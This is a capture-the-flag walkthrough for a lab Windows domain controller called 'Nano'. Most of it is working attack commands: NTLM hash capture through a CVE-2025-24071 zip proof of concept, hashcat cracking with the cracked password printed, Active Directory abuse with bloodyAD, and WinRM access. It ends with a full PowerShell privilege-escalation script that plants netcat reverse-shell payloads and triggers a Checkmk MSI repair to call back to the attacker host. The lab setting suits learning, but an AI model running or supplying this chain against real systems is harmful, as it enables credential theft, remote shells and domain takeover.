๐ฝNano
nano
Command: nmap -A -Pn 10.10.11.93 -o nmapresult
Command: echo 10.10.11.93 nanocorp.htb dc01.nanocorp.htb nanocorp.htb0 >> /etc/hosts
Command: dirbuster -u http://nanocorp.htb
Once popped up, select the directory list, mine is at /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Command: ntpdate 10.10.11.93 dc01.nanocorp.htb0
Command: enum4linux 10.10.11.93
Findings:
Command: userenum โdc 10.10.11.93 -d nanocorp.htb /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt
So far, the results are as below:
Back to exploring the website, when you click on the About Us, โApply Nowโ button appears.
Once you click on it, you will find hire.nanocorp.htb
Command: echo โ10.10.11.93 nanocorp.htb hire.nanocorp.htb dc01.nanocorp.htb nanocorp.htb0โ >> /etc/hosts
Command: git clone https://github.com/0x6rss/CVE-2025-24071_PoC
Command: sudo responder -I tun0 -v
Command: cd CVE-2025-24071_PoC
Command: python3 poc.py,
It will ask for your file name, and your tun0 IP
Once completed a zip file with the name โexploit.zipโ is available.
back to hire.nanocorp.htb, upload the subjected exploit.zip, and make sure you started your responder
After trying 15th Million times, (it was becuase of the wrong IP ๐) i finally got the below hashes:
Command: hashcat -m 5600 -a 0 hash.txt /home/kali/Desktop/wordlists/rockyou.txt/rockyou.txt โforce
Command: hashcat -m 5600 hash.txt โshow WEB_SVC:dksehdgh712!@#
Command: smbclient -L //10.10.11.93 -U WEB_SVC
successfully authenticated as WEB_SVC and listed these shares:
ADMIN$โ Admin share (usually inaccessible without elevated privileges)C$โ Default root of C: drive (same)IPC$โ Inter-process communication (used for remote commands)NETLOGONโ Often contains scripts or policiesSYSVOLโ May contain domain-wide configuration files
Command: ntpdate 10.10.11.93 dc01.nanocorp.htb
Command: impacket-getTGT -dc-ip 10.10.11.93 โnanocorp.htb/WEB_SVC:dksehdgh712!@#โ
Command: export KRB5CCNAME=WEB_SVC.ccache
Command: klist
Command: bloodhound-python -u โWEB_SVCโ -p โdksehdgh712!@#โ -d nanocorp.htb -c All -o bloodhound_results.json -ns 10.10.11.93 -k
Interesting finding when searching through groups: name โIT_SUPPORT@NANOCORP.HTBโ
Found another username: monitoring_user, we will set a new password for it.
Command: bloodyAD โhost dc01.nanocorp.htb -d nanocorp.htb -u โweb_svcโ -p โdksehdgh712!@#โ -k add groupMember it_support web_svc
Command: bloodyAD โhost dc01.nanocorp.htb -d nanocorp.htb -u โweb_svcโ -p โdksehdgh712!@#โ -k set password monitoring_svc โP@ssw0rd444!โ
Command: impacket-getTGT โnanocorp.htbโ/โmonitoring_svc:P@ssw0rd444!โ
Command: export KRB5CCNAME=monitoring_svc.ccache
Command: klist
Command: git clone https://github.com/ozelis/winrmexec.git
Command: python3 /home/kali/Desktop/tools/winrmexec/winrmexec.py -ssl -port 5986 -k nanocorp.htb/monitoring_svc@dc01.nanocorp.htb -no-pass
FOR Root
Command: cp /usr/share/windows-resources/binaries/nc.exe /home/kali/Desktop/tools/RunasCs
Command: python3 -m http.server 8000, to start your listener where the file exists
Command: wget โhttp://10.10.14.34:8000/RunasCs.csโ -UseBasicParsing -OutFile โRunasCs.csโ
First you have to be in /Windows/temp, Command: cd /windows/temp/
Command: wget http://10.10.14.34:8000/nc.exe -UseBasicParsing -OutFile โnc.exeโ
Once uploaded, you should see code 200,
Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe -target:exe -optimize -out:RunasCs.exe RunasCs.cs
Command: nano bad.ps1 and paste the following code, adjust LHOST and LPORT according to your machine
param(
[int]$MinPID = 1000,
[int]$MaxPID = 15000,
[string]$LHOST = "10.10.14.34",
[string]$LPORT = "9001"
)
# 1. Define the malicious batch payload
$NcPath = "C:\Windows\Temp\nc.exe"
$BatchPayload = "@echo off`r`n$NcPath -e cmd.exe $LHOST $LPORT"
# 2. Find the MSI trigger
$msi = (Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\*\InstallProperties' |
Where-Object { $_.DisplayName -like '*mk*' } |
Select-Object -First 1).LocalPackage
if (!$msi) {
Write-Error "Could not find Checkmk MSI"
return
}
Write-Host "[*] Found MSI at $msi"
# 3. Spray the Read-Only files
Write-Host "[*] Seeding $MinPID to $MaxPID..."
foreach ($ctr in 0..1) {
for ($num = $MinPID; $num -le $MaxPID; $num++) {
$filePath = "C:\Windows\Temp\cmk_all_$($num)_$($ctr).cmd"
try {
[System.IO.File]::WriteAllText($filePath, $BatchPayload, [System.Text.Encoding]::ASCII)
Set-ItemProperty -Path $filePath -Name IsReadOnly -Value $true -ErrorAction SilentlyContinue
} catch {
# 123
}
}
}
Write-Host "[*] Seeding complete."
# 4. Launch the trigger
Write-Host "[*] Triggering MSI repair..."
Start-Process "msiexec.exe" -ArgumentList "/fa `"$msi`" /qn /l*vx C:\Windows\Temp\cmk_repair.log" -Wait
Write-Host "[*] Trigger sent. Check listener."
Command: wget โhttp://10.10.14.34:8000/bad.ps1โ -UseBasicParsing -OutFile โbad.ps1โ
Command: nc -lvnp 9001 to start your listener
Command: wget http://10.10.14.34:8000/bad.ps1 -UseBasicParsing -OutFile โbad.ps1โ
Command: .\RunasCs.exe web_svc โdksehdgh712!@#โ โC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Windows\Temp\bad.ps1โ
You should be able to receive the connection where you started your listener.
Last updated